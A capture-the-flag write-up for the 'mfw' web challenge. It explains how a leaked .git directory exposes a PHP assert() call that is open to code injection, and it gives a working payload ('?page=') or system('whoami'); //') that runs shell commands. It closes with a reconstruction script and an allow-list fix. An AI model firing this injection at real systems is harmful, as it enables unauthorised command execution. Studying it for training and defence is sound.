攻防世界 --- mfw
2022-07-21 13:45:00 [jjj34]
Knowledge point 1: .git source leak
Knowledge point 2: code execution through assert()
Solution
Step 1
A directory scan of the site turns up an exposed .git directory (a git source leak).
Recover the repository with the GitHack tool; it writes the reconstructed files into its dist/ directory.
Reading the recovered files one by one, index.php contains the exploitable point: an assert() call whose argument is built from user input.
Step 2
How assert() leads to code execution: in PHP 5.x and 7.x, when the argument passed to assert() is a string, that string is compiled and executed as PHP code (much like eval()). String evaluation in assert() was deprecated in PHP 7.2 and removed in PHP 8.0, so this only works against older targets.
The two relevant lines in index.php (the function is strpos; the check is a double-quoted string, so $file is interpolated into the code before assert() runs it):
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false");
With page = ') //
$file = templates/') //.php
and the code that assert() evaluates is
strpos('templates/') //.php', '..') === false
The ') in the payload closes the string literal and the strpos() call, and // comments out the remainder of the line (the intended second argument, the appended .php and the === false). strpos() is left with a single argument, which on its own only produces a warning, but the same break-out lets us append an expression of our own with or:
page = ') or system('whoami'); //
$file = templates/') or system('whoami'); //.php
code evaluated by assert(): strpos('templates/') or system('whoami'); //.php', '..') === false
strpos() called with one argument emits a warning and returns NULL (PHP 5/7), which is falsy, so or short-circuits to its right-hand side and system('whoami') runs. (On PHP 8 the same call would throw ArgumentCountError, but string arguments to assert() are gone there anyway.)
Putting this together, the payload is
?page=') or system('whoami'); //
Note the semicolon: assert() compiles the string as return <code>; and the // in the payload comments out that appended semicolon, so the injected statement has to terminate itself or the code fails to parse. URL-encode the quotes and spaces when sending the request.
From here it is an ordinary command-execution primitive: replace whoami with whatever command you want system() to run.
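As an added example (not the challenge's index.php and not the author's code), the following PHP reconstructs the exact string the vulnerable assert() evaluates for a given page value, and places a hardened replacement next to it. The template names in the allow-list are assumed; the script itself never passes the string to assert(), so it is safe to run on any PHP version.

```php
<?php
// Added example for the mfw write-up; not the challenge's original index.php.

// Returns exactly the string the vulnerable code hands to assert(). In PHP 5.x
// and 7.x assert() compiles a string argument as PHP code ("return <string>;"),
// which is what makes it injectable. PHP 8.0 removed string evaluation.
function vulnerable_assert_code(string $page): string
{
    $file = "templates/" . $page . ".php";
    // Double-quoted: $file is interpolated *before* assert() sees the string,
    // so a quote in $page closes the literal and the rest is parsed as code.
    return "strpos('$file', '..') === false";
}

// Hardened replacement: user input never reaches evaluated code. The page is
// matched against a fixed allow-list (template names are assumed here) and
// only a known file path is returned; anything else is rejected outright.
function safe_template_path(string $page): ?string
{
    $allowed = ['home', 'about', 'contact'];
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    return "templates/" . $page . ".php";
}

// Walk through the write-up's payload. The echoed line is the code the
// vulnerable assert() would compile: strpos() receives one argument, warns and
// returns NULL, and `or` falls through to system(). The payload's own ';' is
// required because '//' comments out the ';' that assert() appends.
$payload = "') or system('whoami'); //";
echo vulnerable_assert_code($payload), PHP_EOL;

// The allow-list version has nothing to break out of: the payload is rejected,
// a legitimate name resolves to a fixed path.
var_dump(safe_template_path($payload)); // rejected
var_dump(safe_template_path('home'));   // accepted
```

The first echo reproduces the string shown in Step 2 above, which is the whole bug: the check is built by string concatenation and then compiled. The fix is not a better blacklist for `..` but removing evaluation entirely; with an allow-list compare there is no code for the attacker's quote to escape into.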
Supplement
PHP functions that evaluate their argument as code share one root cause: the parameter (or part of it) is compiled and executed as PHP, and from inside that code a call such as system() turns code execution into OS command execution.
1. eval(): the most common sink.
2. assert(): with a string argument on PHP 5.x/7.x (deprecated in 7.2, removed in 8.0); when the injection point sits inside another function call, as with strpos() above, break out of that call and chain your own expression with or.
3. preg_replace() with the /e modifier: the replacement string is evaluated as PHP code (deprecated in PHP 5.5, removed in 7.0).